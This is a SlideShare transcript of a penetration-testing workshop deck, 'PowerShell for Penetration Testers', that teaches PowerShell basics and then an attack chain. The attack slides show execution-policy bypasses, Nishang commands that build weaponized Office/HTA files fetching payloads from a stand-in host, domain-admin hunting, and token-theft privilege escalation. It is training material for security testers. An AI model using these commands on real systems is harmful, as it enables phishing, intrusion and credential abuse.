SlideShare a Scribd company logo
PowerShell
for
Penetration Testers
Nikhil Mittal
Get-Host
• Hacker, Trainer, Speaker, Penetration Tester
• Creator of Kautilya and Nishang.
• Twitter: @nikhil_mitt
• Blog – http://labofapenetrationtester.com
• Interested in Offensive Information Security,
new attack vectors and methodologies to
pwn systems.
• Previous talks:
Defcon, Blackhat, Troopers, DeepSec, EuSecwest,
Hackfest, PHDays etc.
2PowerShell for Penetration Testers HITB
$PFPTLab = Get-Content
• What is PowerShell
• Why PowerShell
• Executing commands, scripts and modules
• Extended PowerShell usage
• A Penetration Testing Scenario
• Defenses
3PowerShell for Penetration Testers HITB
$PFPTLab | Format-Custom
• This is a hands-on workshop, keep your Windows
machines/VMs ready.
• We will stick to PowerShell v2, unless specified
otherwise.
• For language basics, we will go with bare minimum to
be able to cover interesting stuff in couple of hours.
• The workshop assumes zero knowledge of PowerShell
so if you know something:
do {Start-Sleep –s 60}
while {$SomethingNew –ne $true}
4PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“What is PowerShell"}
• “Windows PowerShell® is a task-based command-
line shell and scripting language designed
especially for system administration. Built on the
.NET Framework, Windows PowerShell helps IT
professionals and power users control and
automate the administration of the Windows
operating system and applications that run on
Windows.”
http://technet.microsoft.com/en-
us/library/bb978526.aspx
5PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“Why PowerShell"}
• Present by default on modern Windows OS.
• Tightly integrated with Windows and allows
interaction with .Net, Filesystem, Registry, API,
Certificates, COM, native commands,
network, domain etc.
• Expandable with use of .Net framework.
• Easy to learn.
• Less dependency on *nix based tools.
• Trusted by System Admins, Blue Teams and
(mostly) AV etc.
6PowerShell for Penetration Testers HITB
Why PowerShell?
PowerShell for Penetration Testers HITB 7
http://www.quickmeme.com/ONE-OF-US
about_PowerShell.exe
• powershell.exe is the console part of
PowerShell.
• Execute native commands, cmdlets,
functions and scripts.
• Supports tab completion, command
aliases, Operators etc.
• Provides various options and execution
parameters.
8PowerShell for Penetration Testers HITB
Invoke-HandsOn
• Try running powershell.exe and
Write-Output “Hello World”
• Try usual bash and cmd commands.
9PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“powershell.exe"}
• powershell.exe is the console part of
PowerShell.
• Execute native commands, cmdlets,
functions and scripts.
• Supports tab completion, command
aliases, Operators etc.
• Provides various options and execution
parameters.
10PowerShell for Penetration Testers HITB
Get-Help Get-Help
• Easy to use and very useful.
• This is the first place to go for learning
something new or looking for solution to a
problem.
• Detailed help for cmdlets, conceptual
topics, scripts, functions and modules.
• Supports wildcards.
• You may need to run Update-Help (v3
onwards).
11PowerShell for Penetration Testers HITB
Get-Help Get-Help
• Use with about_* to list help about a
conceptual topic.
• Various parameters could be passed to
Get-Help
Get-Help Get-Help –Full
Get-Help Get-Command -Examples
12PowerShell for Penetration Testers HITB
$Exercise[0]
1. Use PowerShell help system to list
everything available.
2. List help about “process”.
3. List help about powershell.exe conceptual
topic.
13PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“cmdlets"}
• A Cmdlet is pronounced as “command let”.
• Cmdlets are task based compiled .Net classes.
• Certainly one of the best features of
PowerShell.
• They follow a Verb-Noun naming convention.
• Cmdlets have aliases.
• Like every other command in PowerShell,
cmdlets return objects.
14PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“cmdlets"}
• Explore cmdlets
Get-Command –CommandType Cmdlet
• Explore cmdlets based on a verb
Get-Command –Verb Get
• Get-Command also supports wildcards.
15PowerShell for Penetration Testers HITB
Invoke-HandsOn
• I need a count shout for number of
Cmdlets you have on your machine.
Get-Command –CommandType
Cmdlet | Measure-Object
• As you can see, PowerShell supports the
pipe (|) operator as well.
16PowerShell for Penetration Testers HITB
$Exercise[1]
1. I need names of three cmdlets each from
everyone which can be useful in
Penetration Tests.
17PowerShell for Penetration Testers HITB
about_Windows_PowerShell_ISE
• A GUI Scripting environment.
• Tab completion, context-sensitive help,
syntax highlighting, selective execution,
in-line help are some of the useful
features.
• PowerShell scripts have .ps1 extension.
18PowerShell for Penetration Testers HITB
Invoke-HandsOn
1. Write a script which prints Hello World.
2. Save it and execute it.
19PowerShell for Penetration Testers HITB
about_Execution_Policies
20PowerShell for Penetration Testers HITB
about_Execution_Policies
• Execution Policy is present to stop a user from
accidently running scripts.
• There are numerous ways to bypass it:
powershell.exe –ExecutionPolicy bypass
.script.ps1
powershell.exe –EncodedCommand <>
powershell.exe –c <>
Read: 15 ways to bypass PowerShell execution policy
https://www.netspi.com/blog/entryid/238/15-ways-to-
bypass-the-powershell-execution-policy
21PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“Variables"}
• Variables are declared in the form
$varname.
• Variables can hold outputs from Cmdlets,
native commands, functions etc. as each
one returns an object or array of objects.
Examples:
$DirList = Get-Childitem
$UserList = & "net" "user"
22PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“Types"}
• PowerShell is not strictly typed.
• You need not specify the Type of a
variable.
• If required, Type conversion could be done
with the cast [] operator.
23PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“Statements"}
• Conditional Statements
– If, else, elseif, Switch
• Loop Statements
– while() {}, do {} while(), do {} until(), for(;;){},
foreach ( in ){}
– ForEach-Object
24PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“Functions"}
• Basic Declaration
function <function_name> (
param1, param2)
{
do stuff
}
• Calling a function
<function_name> <value1> <value2>
• param statement provides advanced attributes
for function parameters.
25PowerShell for Penetration Testers HITB
Invoke-HandsOn
• Open Check-RegistryKey.ps1
26PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
“Basics of Modules"}
• A simplest module is a PowerShell script
with the extension .psm1
• Use Get-Module -ListAvailable to
list modules.
• Use Import-Module <modulepath>to
import a module.
• Use Get-Command –Module
<Modulename> to list functions exported
by a module.
27PowerShell for Penetration Testers HITB
$Exercise[2]
1. Convert the script Check-RegistryKey.ps1
to a script module.
2. Try importing the module and use its
functions.
28PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net
with PowerShell"}
• Most powerful feature of PowerShell. Great
to extend the existing capabilities of
PowerShell.
• Useful for loading .Net assemblies, using
Windows API, using .Net code and classes
in a PowerShell script.
29PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net
with PowerShell"}
Exploring .Net classes
$ProcClass =
[AppDomain]::CurrentDomain.GetA
ssemblies() | ForEach-Object
{$_.GetTypes()}| where
{$_.IsPublic -eq "True“} |
where {$_.Name -eq “Process”}
30PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net
with PowerShell"}
Using .Net Classes
• Static Methods
$ProcClass | Get-Member –Static
$ProcClass:: GetProcesses()
31PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net
with PowerShell"}
Using .Net Classes
• Creating instance
$WebClient = New-Object System.Net.WebClient
$WebClient | Get-Member –MemberType Method
$WebClient | Get-Member -Name DownloadString |
Format-List *
$WebClient.DownloadString("http://google.com")
32PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net
with PowerShell"}
• Use Add-Type to add .Net code/classes
and Windows API to a PowerShell script or
session.
• See New-DotnetCode.ps1 for example of
using .Net code.
33PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
WMI"}
• WMI is a treasure trove for hackers.
• PowerShell could be used to retrieve
information from WMI as well execute
commands and scripts.
• Explore the cmdlets related to WMI
Get-Command -CommandType Cmdlet –
Name *wmi*
34PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
WMI"}
• To run a PowerShll command using WMI
use:
Invoke-WmiMethod -Class
win32_process -Name create -
ArgumentList "powershell -c
Get-Process" –ComputerName <>
35PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
COM"}
• PowerShell can use COM Objects as well.
• Limitless opportunities for automation!
$ie = New-Object -ComObject
internetexplorer.application
$ie | Get-Member
36PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
PenTest Scenario"}
• Lets consider a Pen Test scenario:
– The Goal of Penetration Test is to get access to
get Domain Administrator access (not a very
good goal but lets target it for this lab .
– Server side attacks have been largely
unsuccessful.
– Msf payloads are being detected by Anti Virus
and other countermeasures.
37PowerShell for Penetration Testers HITB
$Exploitation = $PFPTLab | where-
object {$_ -eq Exploitation"}
• PowerShell is very useful in getting a
foothold system in a target network.
• The trust on PowerShell by system
administrators and countermeasures like
AV makes it an ideal tool for Exploitation.
38PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq
Client Side Attacks"}
• PowerShell is an ideal tool for client side
attacks on a Windows platform.
• It could be used for generating
weaponized files for email phishing
campaigns and drive by download attacks.
• Lets use Client Side attack scripts from
Nishang
(https://github.com/samratashok/nishang)
39PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq
Client Side Attacks"}
• Generating weaponized MS Office Files
Out-Word -Payload "powershell.exe -
ExecutionPolicy Bypass -noprofile -
noexit -c Get-Process“
Out-Word -PayloadURL
http://yourwebserver.com/evil.ps1
Out-Excel -Payload "powershell.exe
–EncodedCommand <>“
40PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq
Client Side Attacks"}
• Drive by download attacks
Out-HTA -PayloadURL
http://192.168.254.1/powerpreter.ps
m1 -Arguments Check-VM
• More weaponized files
Out-CHM
Out-Shortcut
41PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq
Shells"}
• Now that we can run successful client side
attacks, we may need shell level access for
further attacks.
• PowerShell can be used to write shells as
well.
• Shells in PowerShell can be used with
exploits to get access to the target
machine.
42PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq
Shells"}
• Interactive PowerShell Shells from Nishang
• Metasploit’s msfvenom - Meterpreter
using PowerShell
43PowerShell for Penetration Testers HITB
$PostExp = $PFPTLab | where-object
{$_ -eq Post Exploitation"}
• PowerShell is arguably one of the best
tools around for Windows Post
Exploitation.
• We have an interactive PowerShell session
on one of the machines on the target and
various PowerShell tools can be used now.
44PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq
Domain Enumeration"}
• We can use Powerview
(https://github.com/Veil-
Framework/PowerTools/tree/master/Power
View) to enumerate the target domain.
• The goal is to find a machine where a
Domain Admin is logged in.
45PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq
Domain Enumeration"}
• To find machines which have a domain
admin logged in and the current user has
access to that machine:
Invoke-UserHunter –CheckAccess
–Domain <targetdomain>
46PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Priv
Escalation"}
• Now we can use the Domain Admin token
on the target machine using Invoke-
TokenManipulation and some PowerShell
hackery:
Get-Process -id <DA process> |
Invoke-TokenManipulation
CreateProcess cmd.exe
Invoke-TokenManipulation is a part of Powersploit
(https://github.com/mattifestation/PowerSploit)
47PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
Defenses"}
• Log Log Log!
• Monitor and Analyze the logs.
• Understand flow/use of privileges and
credentials in your environment.
• If a determined attacker can break into any
system, a determined system administrator
can catch any attacker as well.
49PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
Credits"}
Credits/FF to PowerShell hackers (in no
particular order)
@obscuresec, @mattifestation,
@JosephBialek, @Carlos_Perez,
@Lee_Holmes, @ScriptingGuys,
@BrucePayette, @dave_rel1k, @enigma0x3,
@subTee, @harmj0y and other PowerShell
bloggers and book writers.
50PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
Closing Remarks"}
• Bad guys are already using PowerShell, using it
for security testing is imperative now. Both for
red teams and blue teams.
• PowerShell is the not the future of Windows
Penetration Testing, it is the present.
51PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
Self Promotion"}
• Check out PowerShell for Penetration Testers
two days trainings at:
http://www.labofapenetrationtester.com/p/tr
ainings.html#pfptschedule
52PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq
Feedback"}
• Please fill the feedback form.
• I am looking for contributors.
• Nishang is available at
https://github.com/samratashok/nishang
• Follow me @nikhil_mitt
• nikhil.uitrgpv@gmail.com
• http://labofapenetrationtester.com/
53PowerShell for Penetration Testers HITB

More Related Content

What's hot

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test   compromising a highly secure environment (nikhil)Ultimate pen test   compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
ClubHack
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
Nikhil Mittal
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
Nikhil Mittal
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
Ryan Cobb
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
Will Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
Will Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Daniel Bohannon
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
Nikhil Mittal
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
Nikhil Mittal
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attack
jaredhaight
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
Will Schroeder
 

What's hot (20)

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test   compromising a highly secure environment (nikhil)Ultimate pen test   compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attack
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 

Viewers also liked

Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
Will Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
Will Schroeder
 
Office 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenOffice 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heaven
Sébastien Levert
 
Practical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionPractical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended Edition
Ben Ten (0xA)
 
PowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewPowerShell Plus v4.7 Overview
PowerShell Plus v4.7 Overview
Richard Giles
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
ÇözümPARK
 
Powershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubPowershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge Club
Essam Salah
 
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Richard Calderon
 
PowerShell from *nix user perspective
PowerShell from *nix user perspectivePowerShell from *nix user perspective
PowerShell from *nix user perspective
Juraj Michálek
 
Managing Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellManaging Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShell
guesta849bc8b
 
PowerShell UIAtomation
PowerShell UIAtomationPowerShell UIAtomation
PowerShell UIAtomation
Juraj Michálek
 
PowerShell 101
PowerShell 101PowerShell 101
PowerShell 101
Thomas Lee
 
Getting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingGetting Started With PowerShell Scripting
Getting Started With PowerShell Scripting
Ravikanth Chaganti
 
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Puppet
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
Salaudeen Rajack
 
Geek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerGeek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL Server
IDERA Software
 
Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015
Ben Ten (0xA)
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShell
Costin-Alin Neacsu
 
Practical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeoplePractical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional People
Ben Ten (0xA)
 
PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!
Thomas Lee
 

Viewers also liked (20)

Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Office 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenOffice 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heaven
 
Practical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionPractical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended Edition
 
PowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewPowerShell Plus v4.7 Overview
PowerShell Plus v4.7 Overview
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
 
Powershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubPowershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge Club
 
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
 
PowerShell from *nix user perspective
PowerShell from *nix user perspectivePowerShell from *nix user perspective
PowerShell from *nix user perspective
 
Managing Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellManaging Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShell
 
PowerShell UIAtomation
PowerShell UIAtomationPowerShell UIAtomation
PowerShell UIAtomation
 
PowerShell 101
PowerShell 101PowerShell 101
PowerShell 101
 
Getting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingGetting Started With PowerShell Scripting
Getting Started With PowerShell Scripting
 
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
Geek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerGeek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL Server
 
Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShell
 
Practical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeoplePractical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional People
 
PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!
 

Similar to Workshop: PowerShell for Penetration Testers

PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course Deck
rICh morrow
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampa
Octavio Paguaga
 
Mastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMastering PowerShell Testing with Pester
Mastering PowerShell Testing with Pester
Mark Wragg
 
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
anshkhurana01
 
From P0W3R to SH3LL
From P0W3R to SH3LLFrom P0W3R to SH3LL
From P0W3R to SH3LL
Arthur Paixão
 
Property Based Testing in PHP
Property Based Testing in PHPProperty Based Testing in PHP
Property Based Testing in PHP
vinaikopp
 
Developer testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticDeveloper testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing Fanatic
LB Denker
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
Boulos Dib
 
PowerShell-1
PowerShell-1PowerShell-1
PowerShell-1
Saravanan G
 
PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2
Bryan Cafferky
 
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyDEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
Felipe Prado
 
Ansible
AnsibleAnsible
Ansible
Michal Haták
 
ONOS System Test - ONS2016
ONOS System Test - ONS2016ONOS System Test - ONS2016
ONOS System Test - ONS2016
Suibin Zhang
 
Power shell for sp admins
Power shell for sp adminsPower shell for sp admins
Power shell for sp admins
Rick Taylor
 
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
Bryan Cafferky
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent Event
Tencent
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
coLearning PHP
coLearning PHPcoLearning PHP
coLearning PHP
ben.routson
 
Test in action week 2
Test in action   week 2Test in action   week 2
Test in action week 2
Yi-Huan Chan
 

Similar to Workshop: PowerShell for Penetration Testers (20)

PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course Deck
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampa
 
Mastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMastering PowerShell Testing with Pester
Mastering PowerShell Testing with Pester
 
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
 
From P0W3R to SH3LL
From P0W3R to SH3LLFrom P0W3R to SH3LL
From P0W3R to SH3LL
 
Property Based Testing in PHP
